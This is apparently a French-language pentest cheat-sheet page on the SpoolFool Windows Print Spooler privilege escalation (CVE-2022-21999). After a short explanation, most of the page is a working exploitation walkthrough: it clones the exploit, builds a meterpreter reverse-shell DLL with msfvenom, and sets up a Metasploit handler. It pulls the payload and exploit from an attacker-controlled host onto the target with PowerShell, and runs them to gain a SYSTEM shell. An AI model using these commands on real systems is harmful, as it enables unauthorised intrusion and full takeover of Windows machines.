🖨️SpoolFool
Oliver Lyak a publié un article sur une vulnérabilité d'escalade de privilèges Windows qui persistait dans les systèmes Windows même après la correction des vulnérabilités précédentes dans Print Spooler CVE-2020-1048 et CVE-2020-1337. Oliver s'est vu attribuer la CVE-2022-21999 pour cette vulnérabilité et l'a communément appelée "SpoolFool".
La vulnérabilité permet à un utilisateur non privilégié de créer des répertoires arbitraires et inscriptibles en configurant l'attribut SpoolDirectory sur une imprimante. Puisqu'un utilisateur non privilégié est autorisé à ajouter des imprimantes distantes, un attaquant peut créer une imprimante distante et donner à TOUT LE MONDE le droit de gérer cette imprimante. Cela renverrait un descripteur avec le droit PRINTER_ACCESS_ADMINISTER qui peut ensuite être utilisé pour effectuer des tâches telles que l'injection de DLL.
Exploitation
# Téléchargement de l'exploit
git clone https: //github.com/ly4k/SpoolFool
cd SpoolFool
Dans un premier temps il nous faut créer un payload et ouvrir un multi handler sur notre machine.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST= <attacker IP> LPORT= <port d'écoute> > reverse. dll
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT <port d'écoute>
exploit
On va ensuite télécharger notre reverse shell et notre exploit sur la machine cible.
> powershell -c iwr http: //<attacker IP>/reverse.dll -outf \Users\Public\reverse.dll
> powershell -c iwr http: //<attacker IP>/SpoolFool.exe -outf \Users\Public\SpoolFool.exe
Nous pouvons maintenant exécuter l'exploit.
C:\users\public> SpoolFol.exe -dll reverse.dll
Si tout se passe bien, nous devrions avoir reçu une session meterpreter avec les droits NT AUTHORITY\SYSTEM sur notre multi handler.
Dernière mise à jour
Cet article vous a-t-il été utile ?